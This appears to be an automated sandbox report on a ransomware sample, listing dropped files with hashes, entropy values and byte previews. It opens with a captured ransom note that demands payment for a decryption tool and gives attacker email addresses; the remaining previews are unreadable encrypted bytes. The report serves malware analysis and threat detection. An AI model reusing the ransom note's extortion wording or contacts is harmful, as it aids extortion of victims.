                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.157254420551074
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:E7tWjIjOnPE6vNlrYnbIuYzCJuxqy0V59XahhDiSPzeoSnCCmrk2n:E7tmTVRKbIuYuwePBmZiEeouqBn
                                                                                                    MD5:A8EB4899A6B798DDE318E55942EF461D
                                                                                                    SHA1:F2837BA3B26F8C006844C3B9FFB1696BB9F3B7B1
                                                                                                    SHA-256:9880EC111207650CF4B95D13BFBAAA35B6DD9A68A22008D6FA0C597D0D23283E
                                                                                                    SHA-512:E5953C1DC1483F895A544FCA426325DB026D925E4BA2E7D3BBA9935DB4B9D10AD772DE091B7E5B1CA7866FC50895AC83444A296630FAFF368A7AA1EBC0D12A88
                                                                                                    Malicious:true
                                                                                                    Preview:.(.....j~...8h............... "..D2>....(`y.r|=.&2.^.?...h@...K.?M%..b...v..ut.#.2.R.h!....>.._.W..v.l;.3..;...>......;....&.t...B...........n.+...H.....i|..%Q.o.2.17.w.>........2:.e.\.V..(p.u.h..m..+.X...F_..'.~.&...0.y..%...q.S>f.Z.@B.B.........7...u....F.@Jm.U.?....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6595597589884336
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/O6ZmqTv0TaepEipF+jk/TS1D4ROAgcb6jPnzO7w:/ttoakT+jATSoO1cM
                                                                                                    MD5:BD9070857098828600D508B7FCF94D1C
                                                                                                    SHA1:132FB9508EDEB968F853AAE7FD347E0C26F447A5
                                                                                                    SHA-256:F11D262CBA2187BA8B5283E0B9D2B0AF8194A559EF6E7D7F1F4178453F8133E5
                                                                                                    SHA-512:C8F698F726231EEF82ED4CF3D6BC7FA3581A379C6FA3D9E84A61D1C782BA558E2A5A144B44303CDF4B57B1F5C4C3D28F087F041BBDA0ED3343BA9A6532E0BCB8
                                                                                                    Malicious:true
                                                                                                    Preview:3.\"..e'.k...TZ..d...Y...5d.......x......A.F...j...8H...:.~u...`Q......F.a>.JY=..M.;....9.J...w...d.....-B1...81.5@\JV..[n.s.YQ=...3).m.;......C(...t...<.-D...m.....et....'._R...0...$....,.$.K"a%4.._.p...`.;.....PB.ys5.R....ru.Wa..W(...o....v"Q...o..SV......s.R....a.....&W~....d.2..P..{W....L......b/.....hi...WQy....%j...&.]a$.'..0;F..7........K4,B1.....05`...;.%.b,d....H(K.b?...\.DB..1...]...c..gH...C..T.I..H..D-..6.p..d"../.q...o..1X'...i......B$...&......Y.a.1.\.._........"\.....UeX....x.BN.&.<....^.:..^.....G.y.+'.....6U...$.. ......^A..;o...M.^.".Q.c.......F.p:.^..m...0...ztfC.V#J97.:........?z..).A.:'.&...S......3:...%..QWc....H>8.K.!eW....~#....t...M...Sf.BX>/I...P.......,... W.....>.\..Bv.h%....,X..Z"q:E...9&]H.....D.FW.Z\...`u.A.E..W.....;k-P.j.."./.f..'..9\..g..JgL..Hv......'..'......r;k._.g.z...?.TZO..rHT..A..e.://.....v.....{./.2.....B./.h;....h.A....w..../XlU...]D.|a..m..E......o.}xuc...*P......3....^k...s..B..H..4.6+\..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6595597589884336
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/O6ZmqTv0TaepEipF+jk/TS1D4ROAgcb6jPnzO7w:/ttoakT+jATSoO1cM
                                                                                                    MD5:BD9070857098828600D508B7FCF94D1C
                                                                                                    SHA1:132FB9508EDEB968F853AAE7FD347E0C26F447A5
                                                                                                    SHA-256:F11D262CBA2187BA8B5283E0B9D2B0AF8194A559EF6E7D7F1F4178453F8133E5
                                                                                                    SHA-512:C8F698F726231EEF82ED4CF3D6BC7FA3581A379C6FA3D9E84A61D1C782BA558E2A5A144B44303CDF4B57B1F5C4C3D28F087F041BBDA0ED3343BA9A6532E0BCB8
                                                                                                    Malicious:false
                                                                                                    Preview:3.\"..e'.k...TZ..d...Y...5d.......x......A.F...j...8H...:.~u...`Q......F.a>.JY=..M.;....9.J...w...d.....-B1...81.5@\JV..[n.s.YQ=...3).m.;......C(...t...<.-D...m.....et....'._R...0...$....,.$.K"a%4.._.p...`.;.....PB.ys5.R....ru.Wa..W(...o....v"Q...o..SV......s.R....a.....&W~....d.2..P..{W....L......b/.....hi...WQy....%j...&.]a$.'..0;F..7........K4,B1.....05`...;.%.b,d....H(K.b?...\.DB..1...]...c..gH...C..T.I..H..D-..6.p..d"../.q...o..1X'...i......B$...&......Y.a.1.\.._........"\.....UeX....x.BN.&.<....^.:..^.....G.y.+'.....6U...$.. ......^A..;o...M.^.".Q.c.......F.p:.^..m...0...ztfC.V#J97.:........?z..).A.:'.&...S......3:...%..QWc....H>8.K.!eW....~#....t...M...Sf.BX>/I...P.......,... W.....>.\..Bv.h%....,X..Z"q:E...9&]H.....D.FW.Z\...`u.A.E..W.....;k-P.j.."./.f..'..9\..g..JgL..Hv......'..'......r;k._.g.z...?.TZO..rHT..A..e.://.....v.....{./.2.....B./.h;....h.A....w..../XlU...]D.|a..m..E......o.}xuc...*P......3....^k...s..B..H..4.6+\..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):784
                                                                                                    Entropy (8bit):7.749959931253222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+xfmSnQAN7Uta066dPcw9ANzj2lMsJYc/:+xfmQQw72ZPcrNGldmc/
                                                                                                    MD5:0CB12CC8EBEFC57E2BCF012D9A859FAE
                                                                                                    SHA1:6E720F76178AAC15B65A3EFBDDD64483020B0732
                                                                                                    SHA-256:D8FF380C3150CD70DDD87DCC11038CE2A494DBF8B5ECE657FDB7AF2D32A226EA
                                                                                                    SHA-512:873EC7D476447E107CCFCB5B1C9A14D9A637A57DDDA75314D4B3D30CA9F9B4A6EF48917EF6D086538D074AAFB1B2A20067F3EF0468FDD5EC62E230BACD3E9D48
                                                                                                    Malicious:true
                                                                                                    Preview:2."..V.....A..=.@y=..j.k....[+......Jb).4H........-%.]..~.Hb)&...N.~.....b..... .m:^.g312...m..LA."..u..._!...q...;..L....F...^.$6..v..L*...... .B.. e...s"....!\;.v).6f......R..o.).....8.Kz..B....z...T.;.(^|.V.....g.e..:Nrc..c3[0.M.....Z.jo.....oA.8..../L.!.J.,U...j...&...fy.gS>T.. ...NO..4......j.U.PQ.o.X...U.._u.z..D.[}.X)..5..7...%......Y.P.h.%u.,n$m.SM.Ti...L. F....D..n..XR.(..x..:.4f.F-[M..M^#...#......>iy".. j+....H....3..]......2g,...T.n..._.....s.....K.':XB....;.......R.[..})....I.KX..>.0./]..&....W.?...Y*....&...AZ......t/s.s.t..|.0n.XG.h.).P"..[l../...D[...y.v."..m.J.<c....G@...=...G_..."..y.m7.Aa.WmO.4... ...Zy.Q.@.E.B.s..x.J6h..._..........7|.l...*.(8.,...!.....v.M...E.PM.mW/..w..D.^........j%.pq.<WU..5Mx..R*...-.(.{s0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):784
                                                                                                    Entropy (8bit):7.749959931253222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+xfmSnQAN7Uta066dPcw9ANzj2lMsJYc/:+xfmQQw72ZPcrNGldmc/
                                                                                                    MD5:0CB12CC8EBEFC57E2BCF012D9A859FAE
                                                                                                    SHA1:6E720F76178AAC15B65A3EFBDDD64483020B0732
                                                                                                    SHA-256:D8FF380C3150CD70DDD87DCC11038CE2A494DBF8B5ECE657FDB7AF2D32A226EA
                                                                                                    SHA-512:873EC7D476447E107CCFCB5B1C9A14D9A637A57DDDA75314D4B3D30CA9F9B4A6EF48917EF6D086538D074AAFB1B2A20067F3EF0468FDD5EC62E230BACD3E9D48
                                                                                                    Malicious:false
                                                                                                    Preview:2."..V.....A..=.@y=..j.k....[+......Jb).4H........-%.]..~.Hb)&...N.~.....b..... .m:^.g312...m..LA."..u..._!...q...;..L....F...^.$6..v..L*...... .B.. e...s"....!\;.v).6f......R..o.).....8.Kz..B....z...T.;.(^|.V.....g.e..:Nrc..c3[0.M.....Z.jo.....oA.8..../L.!.J.,U...j...&...fy.gS>T.. ...NO..4......j.U.PQ.o.X...U.._u.z..D.[}.X)..5..7...%......Y.P.h.%u.,n$m.SM.Ti...L. F....D..n..XR.(..x..:.4f.F-[M..M^#...#......>iy".. j+....H....3..]......2g,...T.n..._.....s.....K.':XB....;.......R.[..})....I.KX..>.0./]..&....W.?...Y*....&...AZ......t/s.s.t..|.0n.XG.h.).P"..[l../...D[...y.v."..m.J.<c....G@...=...G_..."..y.m7.Aa.WmO.4... ...Zy.Q.@.E.B.s..x.J6h..._..........7|.l...*.(8.,...!.....v.M...E.PM.mW/..w..D.^........j%.pq.<WU..5Mx..R*...-.(.{s0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5243146
                                                                                                    Entropy (8bit):0.05155073689450485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5rbh1KJR/p84Qr54w0VW3xW/bXWzvACzbJ0DApVJJc:Zh1KJf8VqVW3orWzvACzbJ0DApVU
                                                                                                    MD5:61DF122B0BA71D6D08E5D69D696B8C9B
                                                                                                    SHA1:94EFEF0B3F7156FE266920EDC0EC063316E6E308
                                                                                                    SHA-256:3F73425183BB18C6EB38AEDD0C09F3D8996483BD3D2FABD67D221ECFFF145966
                                                                                                    SHA-512:CE9870DD153841473FFD86B9C4FCC21FBD6899C89EE1658566B8FCB2B0E74E22A76E880A665C6EEBA2FA110D1D4BD2F2D4D277B490252715E233533F84C6C832
                                                                                                    Malicious:true
                                                                                                    Preview:'...\.,5..5s..G...7..>k(T.q...;#*.9.n.&...K.....R^.5.5n....Rs...PH'@.I.+....:............A..*.NC..c.X.?.3..Y.....'.OK..B.......2..".P\..P.-...t..>.w....K..@mV..4..=^..pGNQ..`....F.BP...1....zEl.@=.....<.....\RN..I...v....M..BUp..G.[....q^..@.....@D.(.....k...Ij.g./..w.....G......`.Q.I..w#.@.L.]....W...t..3..5]9R.h.P....B..2...Prq..6..(.y.ZFWp.....H.u.T.Mi.V...2.[..$..).5..i..y. .ro]...,....vt.U.#s.T.....O..._......?.>..)!...<I)dv...........#]...s...6...@........T.2.X..j...?...5....U...1...GA(.@.R<.Eg...4....6\.K*,....`......h.@.L&...M.6.:%BJ...P.F..q2....(...A.e...#...}.2..r!2Sb.).......L.... .&~..&.R.H..a..+..K.....0...S..S._-...Q...h..9$.'.r..l....kV.~.q}.......z.o.QvZ...d.>.J......='Rs......K..!..Q.g..=..,....=LWMmH...x/.B..t...M.m.......6..!;4..7i.b......i..[O...R.Ta.t..e..Q..9.I?...p..`.E......q..Q...*..1......".......<.s6(.a...1...wx..H...L..G......b.1s4. ..BhZt?.....o.o.G~Da..?69t..m..|n.N....2.2."$..^...S..@.. ..*.Ts.f.b.J5}k'.....S....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6055464652761426
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZF64IEzoVhtHo2KQ5JUllkhd89CjBR055cTatprP9cXK:wEmHo2VJwQmi0vG44XK
                                                                                                    MD5:5498B596F3C5CE86AC7E6897C5E7947F
                                                                                                    SHA1:B285B7A576546DB2322136BFC79EE0E7274D820D
                                                                                                    SHA-256:4EB62DED7C3152567225F1C62F0DC9CFF33D709515D1D420A37BBE25D5597687
                                                                                                    SHA-512:124DD5243FB1D32A70FC2994CAA005A4BF51F0AE0ED8AB9EDDD86FEDCC659169783038D789E3922CA4DA2B5E62CE6E2E546E23D7FD95D69E8DB49EB065803395
                                                                                                    Malicious:true
                                                                                                    Preview:.....'......{X.5.N.J.q........X.K.!.'._.%Qz..X6.j.(^.u.c7...2j.D.Z.-+..[2}Yg.i.c..Tb.R.....I....8.K^....Rk....|..8.3s......B....W.i....T6..A..K..-.....X..........m{\c7.)a.q..]..$.......~..svC.B..]h..T.|....I...\.{%7.AN.k.f..m.....Wc.....!.Y.....~...}CW.A...;... .;....?....#J...&.3d|T...PM.QS.e6...;5..{r.c?.F.x?>...C..]._.O=........u.yl#':.R..b_.._.X@.8.._...r..w....Io..k<....n..D..<.1..........)....U..A`.)m@..m...OF.....kL..S..j.Su.....d.C.p.e:-2.....@<.\'.9..obt4.22.&u.4......d.7.....vm-..HP.*2.N....O!w\.(...\.w.../?y.g...G9....X..Ow....a_..|. .m......_...&.:.....`...F..=)!n.1.Y].`.I*..h.w. :.Y.m....;7.f3%d./..Zx.....g}B.D}~......_h.....c...%R../..H.cc..Z|N..2.J.`.l..d...}(L$.SRvJ...W....X9.X.g..*..#I.*...7.....9...~k.A.T.....G...8^.....c.F3......~fo,...*.W.n|?....j.s.....[.i..Ty.U.KnY...D(Q.'d=]...1\S.v{..V...t......u*.0w}..U......@MMv..)..=.......GF....i1...GZ$G./,$k.=F..Bs.YH....,.'.T.K.....dP...^...X.?~...,..<|...*l....Sl...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6055464652761426
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZF64IEzoVhtHo2KQ5JUllkhd89CjBR055cTatprP9cXK:wEmHo2VJwQmi0vG44XK
                                                                                                    MD5:5498B596F3C5CE86AC7E6897C5E7947F
                                                                                                    SHA1:B285B7A576546DB2322136BFC79EE0E7274D820D
                                                                                                    SHA-256:4EB62DED7C3152567225F1C62F0DC9CFF33D709515D1D420A37BBE25D5597687
                                                                                                    SHA-512:124DD5243FB1D32A70FC2994CAA005A4BF51F0AE0ED8AB9EDDD86FEDCC659169783038D789E3922CA4DA2B5E62CE6E2E546E23D7FD95D69E8DB49EB065803395
                                                                                                    Malicious:false
                                                                                                    Preview:.....'......{X.5.N.J.q........X.K.!.'._.%Qz..X6.j.(^.u.c7...2j.D.Z.-+..[2}Yg.i.c..Tb.R.....I....8.K^....Rk....|..8.3s......B....W.i....T6..A..K..-.....X..........m{\c7.)a.q..]..$.......~..svC.B..]h..T.|....I...\.{%7.AN.k.f..m.....Wc.....!.Y.....~...}CW.A...;... .;....?....#J...&.3d|T...PM.QS.e6...;5..{r.c?.F.x?>...C..]._.O=........u.yl#':.R..b_.._.X@.8.._...r..w....Io..k<....n..D..<.1..........)....U..A`.)m@..m...OF.....kL..S..j.Su.....d.C.p.e:-2.....@<.\'.9..obt4.22.&u.4......d.7.....vm-..HP.*2.N....O!w\.(...\.w.../?y.g...G9....X..Ow....a_..|. .m......_...&.:.....`...F..=)!n.1.Y].`.I*..h.w. :.Y.m....;7.f3%d./..Zx.....g}B.D}~......_h.....c...%R../..H.cc..Z|N..2.J.`.l..d...}(L$.SRvJ...W....X9.X.g..*..#I.*...7.....9...~k.A.T.....G...8^.....c.F3......~fo,...*.W.n|?....j.s.....[.i..Ty.U.KnY...D(Q.'d=]...1\S.v{..V...t......u*.0w}..U......@MMv..)..=.......GF....i1...GZ$G./,$k.=F..Bs.YH....,.'.T.K.....dP...^...X.?~...,..<|...*l....Sl...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.196439692727096
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:4T4e90ZgR4H/JE+Ws0EYP5gM5hR+V+oEKWc46NgOf2Z7sl7vl6Hn:4Tr+Zgefabs9YuM574+ZKWL6R2Wl7Gn
                                                                                                    MD5:CFC125FCE8B894A99CC34653AAFFC35F
                                                                                                    SHA1:540735981BB075D99E2AE578B8B7C44633766C63
                                                                                                    SHA-256:AE27DAA27E9D41663AB597733646FEE997B0D1B742B6F0EE3765A3FF670761D9
                                                                                                    SHA-512:4CB01F89A92A26FBA45C8105AB0737633536333A7CA9F0F07F61FE92C68C5848F88C45208A5C4A77F63C88251A102B4F037FFD516AAFD74F7B2CDCFEC26F489F
                                                                                                    Malicious:true
                                                                                                    Preview:$..=..)..s...I............~b~A:...Q.04'....R.]...|...;...n<.......yj.T.e..~.. !.6=.......n....}_#...R=.....O.S..M."e]j.{@A.a,z..sRWW%...a..G.i..._|....q.rm...oN..&...A.p..k@[.{z.9.g.o.. ..Kd'S...f..........).+.........N....6p.p..........RPd.....e...\...B.:...5.[GiB..hg.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5243146
                                                                                                    Entropy (8bit):0.05155073689450485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5rbh1KJR/p84Qr54w0VW3xW/bXWzvACzbJ0DApVJJc:Zh1KJf8VqVW3orWzvACzbJ0DApVU
                                                                                                    MD5:61DF122B0BA71D6D08E5D69D696B8C9B
                                                                                                    SHA1:94EFEF0B3F7156FE266920EDC0EC063316E6E308
                                                                                                    SHA-256:3F73425183BB18C6EB38AEDD0C09F3D8996483BD3D2FABD67D221ECFFF145966
                                                                                                    SHA-512:CE9870DD153841473FFD86B9C4FCC21FBD6899C89EE1658566B8FCB2B0E74E22A76E880A665C6EEBA2FA110D1D4BD2F2D4D277B490252715E233533F84C6C832
                                                                                                    Malicious:false
                                                                                                    Preview:'...\.,5..5s..G...7..>k(T.q...;#*.9.n.&...K.....R^.5.5n....Rs...PH'@.I.+....:............A..*.NC..c.X.?.3..Y.....'.OK..B.......2..".P\..P.-...t..>.w....K..@mV..4..=^..pGNQ..`....F.BP...1....zEl.@=.....<.....\RN..I...v....M..BUp..G.[....q^..@.....@D.(.....k...Ij.g./..w.....G......`.Q.I..w#.@.L.]....W...t..3..5]9R.h.P....B..2...Prq..6..(.y.ZFWp.....H.u.T.Mi.V...2.[..$..).5..i..y. .ro]...,....vt.U.#s.T.....O..._......?.>..)!...<I)dv...........#]...s...6...@........T.2.X..j...?...5....U...1...GA(.@.R<.Eg...4....6\.K*,....`......h.@.L&...M.6.:%BJ...P.F..q2....(...A.e...#...}.2..r!2Sb.).......L.... .&~..&.R.H..a..+..K.....0...S..S._-...Q...h..9$.'.r..l....kV.~.q}.......z.o.QvZ...d.>.J......='Rs......K..!..Q.g..=..,....=LWMmH...x/.B..t...M.m.......6..!;4..7i.b......i..[O...R.Ta.t..e..Q..9.I?...p..`.E......q..Q...*..1......".......<.s6(.a...1...wx..H...L..G......b.1s4. ..BhZt?.....o.o.G~Da..?69t..m..|n.N....2.2."$..^...S..@.. ..*.Ts.f.b.J5}k'.....S....
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10242
                                                                                                    Entropy (8bit):7.104247032071078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qDP+vnx9UJgAW/m5JEWl+Q5I3zTysUzaX/6aRMKWPzDNBw8DK9mSGV:c2vxKJgtqETQ5I3zTpUtgmrwbwTV
                                                                                                    MD5:81DF028D5993F68675C6A80DCAB3D6E0
                                                                                                    SHA1:88E61AB7A299D0C720B5246854B352A454879CB9
                                                                                                    SHA-256:51467C0940CBF74E9A8B53C62FAADCBC5A91AA99A0B2EDDE9076465345DFA7C3
                                                                                                    SHA-512:20A3CA55F5CD9A438387010AC1426B9DB19C8B07B7B7C4CA77FCB34598DA9FA3BFB585249D5326045381F631B978D3AA15AED1605C79AB03F5D6BE1DCE1DDA78
                                                                                                    Malicious:true
                                                                                                    Preview:7....6L......aP....a.......[.R...?..vn.%......].....6t.A3...........*.X...+|...N1..6[....A)D..]......O........T....5B;z......,.....y..#.P..OG.2...EA:.L.{.s.b.........C..0..i..Lk....G.A..l.....Qx7.L.70..%...)..W.......s.~..+I..##....vk.....MR..u..a..F..5..j.?..I..Q.d...V._...J....-.Z.#..Q~.......=.<?;...N.*)..9..N1.=......Mt .8.X.....(g-LO....y.....n9..g.D............Gu........?...o...<....o..y..k..M$O.*I<....v.r....xA;.r......w..e..>....." .{3..w.).n}.n@.5r.=.6_....$.e~.....t...t....i......x..cD......o-..Z...{m....@}.....n...Me.K.q..x7S..x5.Zt.![.6`.*._...^`y/..4....c_....tb{...&.E....c.P.&Q..{..C....y..6yj8.t...^..&..[.Pmx.....P../................m~.....zH.....3..X..g...I..1/..W.sa..f........s./...(Sa..X.H....m.....].x.....V/.@.\..N3N.&...F..nJU^-.....Pr..?.z.]...f.q.%.w#U$G/w.zNI...djM3.l.o...x.jx..eUr.:.#.D.S..l.ffn.......B.R..4....j....;w.......9]/.."..u;h.Mkn..Vi..h...@K.pQQj...0._>n..K.._.N...?q.....e...8.GP_.4.Z....V.Ym.K.......
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10242
                                                                                                    Entropy (8bit):7.104247032071078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qDP+vnx9UJgAW/m5JEWl+Q5I3zTysUzaX/6aRMKWPzDNBw8DK9mSGV:c2vxKJgtqETQ5I3zTpUtgmrwbwTV
                                                                                                    MD5:81DF028D5993F68675C6A80DCAB3D6E0
                                                                                                    SHA1:88E61AB7A299D0C720B5246854B352A454879CB9
                                                                                                    SHA-256:51467C0940CBF74E9A8B53C62FAADCBC5A91AA99A0B2EDDE9076465345DFA7C3
                                                                                                    SHA-512:20A3CA55F5CD9A438387010AC1426B9DB19C8B07B7B7C4CA77FCB34598DA9FA3BFB585249D5326045381F631B978D3AA15AED1605C79AB03F5D6BE1DCE1DDA78
                                                                                                    Malicious:false
                                                                                                    Preview:7....6L......aP....a.......[.R...?..vn.%......].....6t.A3...........*.X...+|...N1..6[....A)D..]......O........T....5B;z......,.....y..#.P..OG.2...EA:.L.{.s.b.........C..0..i..Lk....G.A..l.....Qx7.L.70..%...)..W.......s.~..+I..##....vk.....MR..u..a..F..5..j.?..I..Q.d...V._...J....-.Z.#..Q~.......=.<?;...N.*)..9..N1.=......Mt .8.X.....(g-LO....y.....n9..g.D............Gu........?...o...<....o..y..k..M$O.*I<....v.r....xA;.r......w..e..>....." .{3..w.).n}.n@.5r.=.6_....$.e~.....t...t....i......x..cD......o-..Z...{m....@}.....n...Me.K.q..x7S..x5.Zt.![.6`.*._...^`y/..4....c_....tb{...&.E....c.P.&Q..{..C....y..6yj8.t...^..&..[.Pmx.....P../................m~.....zH.....3..X..g...I..1/..W.sa..f........s./...(Sa..X.H....m.....].x.....V/.@.\..N3N.&...F..nJU^-.....Pr..?.z.]...f.q.%.w#U$G/w.zNI...djM3.l.o...x.jx..eUr.:.#.D.S..l.ffn.......B.R..4....j....;w.......9]/.."..u;h.Mkn..Vi..h...@K.pQQj...0._>n..K.._.N...?q.....e...8.GP_.4.Z....V.Ym.K.......
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65802
                                                                                                    Entropy (8bit):0.9010001588007273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bJqStyTXfy4m6Tq7s5dCXomfej7yirozt7LhOao:EVPy56TQs5po6Zrox7F5o
                                                                                                    MD5:B75AA00B63D58C6272AA26C230C9E959
                                                                                                    SHA1:C8FF43DD3AE74E43A8436EE9957303F79975ECC5
                                                                                                    SHA-256:03E3BBD7E6A17D398B5FBD2ECB587AFD1C9E0484D2BA443067089078CE505ED6
                                                                                                    SHA-512:5DF8B02EDEF52CED41BD6419C7E5B2D5FE7CA88F2C11E7E3582FC8225E4FAD65C180290D6FC70EA1AB97455C5B652A165DA47E774B2A36350395274F4A4FB076
                                                                                                    Malicious:true
                                                                                                    Preview:.O.0a.."^_>..$.A....fe.JjcS.......+%.....^<.|.....I...If..........@h.._...I.d.[.2E;^T..cFfv......T.].....)u.am..$./.^#S.......e..`.T..`.G..y....O9..l.W....aZ...2.#57.'.C._4.7~-xA...b.m.3...|.:'..vr.....1.-.f.hd...C.].Y?..{9.._.$..E.....4...)....2gn.("y..%...K..>&...h.h,....~s7.TEs6..LX...1........../.g2.@.. ...5,.U.....Q.C."....5W.....u..W~.S.!Oj.KG.. v|.ly.H..1....:.P.e...?...&.K..f...F.P>`.Ve^..b......,.{C..+.=.U........qcVC......~|..^......J..S..2W........O.....%......ww... .....\...i.cP>..KJ...-.8Q...u:.......m.c....t[...j..FN.j..4..X..._L@.ah..>.._....a.k x......&)..k,.x.....&;...JT4J.5MRi.."._.X9..."....2!_.VeE2..W...?c[....q.!.!....l7>.a...N.@...Ku..9.z.M....GDR0...@.C\...<.",..%=.(.. ya.Uzk#...D.(.j._...Q.4K..o{2m...D..V.PQB.\\.g..}.M..5.r...yOYk..........=.......k;....k.E........b.5.g.XW.X.3...bv...L.k.Aj.. [.-G.Q._:.E....5K.&..?..\t.{.i..;...Z.VWW....%u.q%.O....R....9....V=p........T....K%cH.....}..S.-.{.)0".A.bT.CI.....z..R.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65802
                                                                                                    Entropy (8bit):0.9010001588007273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bJqStyTXfy4m6Tq7s5dCXomfej7yirozt7LhOao:EVPy56TQs5po6Zrox7F5o
                                                                                                    MD5:B75AA00B63D58C6272AA26C230C9E959
                                                                                                    SHA1:C8FF43DD3AE74E43A8436EE9957303F79975ECC5
                                                                                                    SHA-256:03E3BBD7E6A17D398B5FBD2ECB587AFD1C9E0484D2BA443067089078CE505ED6
                                                                                                    SHA-512:5DF8B02EDEF52CED41BD6419C7E5B2D5FE7CA88F2C11E7E3582FC8225E4FAD65C180290D6FC70EA1AB97455C5B652A165DA47E774B2A36350395274F4A4FB076
                                                                                                    Malicious:false
                                                                                                    Preview:.O.0a.."^_>..$.A....fe.JjcS.......+%.....^<.|.....I...If..........@h.._...I.d.[.2E;^T..cFfv......T.].....)u.am..$./.^#S.......e..`.T..`.G..y....O9..l.W....aZ...2.#57.'.C._4.7~-xA...b.m.3...|.:'..vr.....1.-.f.hd...C.].Y?..{9.._.$..E.....4...)....2gn.("y..%...K..>&...h.h,....~s7.TEs6..LX...1........../.g2.@.. ...5,.U.....Q.C."....5W.....u..W~.S.!Oj.KG.. v|.ly.H..1....:.P.e...?...&.K..f...F.P>`.Ve^..b......,.{C..+.=.U........qcVC......~|..^......J..S..2W........O.....%......ww... .....\...i.cP>..KJ...-.8Q...u:.......m.c....t[...j..FN.j..4..X..._L@.ah..>.._....a.k x......&)..k,.x.....&;...JT4J.5MRi.."._.X9..."....2!_.VeE2..W...?c[....q.!.!....l7>.a...N.@...Ku..9.z.M....GDR0...@.C\...<.",..%=.(.. ya.Uzk#...D.(.j._...Q.4K..o{2m...D..V.PQB.\\.g..}.M..5.r...yOYk..........=.......k;....k.E........b.5.g.XW.X.3...bv...L.k.Aj.. [.-G.Q._:.E....5K.&..?..\t.{.i..;...Z.VWW....%u.q%.O....R....9....V=p........T....K%cH.....}..S.-.{.)0".A.bT.CI.....z..R.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36762
                                                                                                    Entropy (8bit):5.915425479943547
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:xidS1ywWO5LDC5GhiUY1PVJGvkNwNoXzFS5EJ:xidSAQ52cVIHGvkNwNoXzFS54
                                                                                                    MD5:00D39D589C2761E2E5BECD870E8C173C
                                                                                                    SHA1:D88573A437A7A605C91E6924750F66766EED80A7
                                                                                                    SHA-256:7FDDE0025E0EF1A37F6CC9F2FDC2C53446C138A3F14F17F33536210AB52E63A8
                                                                                                    SHA-512:571D0DCDF3B8CFE41AEEE538381D44CBDCD91C9556751591DE9195673989D02F81701BD4B60085A52171A774C87583FCA7FB22B4DEAC5737F2CBF81EE93CB787
                                                                                                    Malicious:true
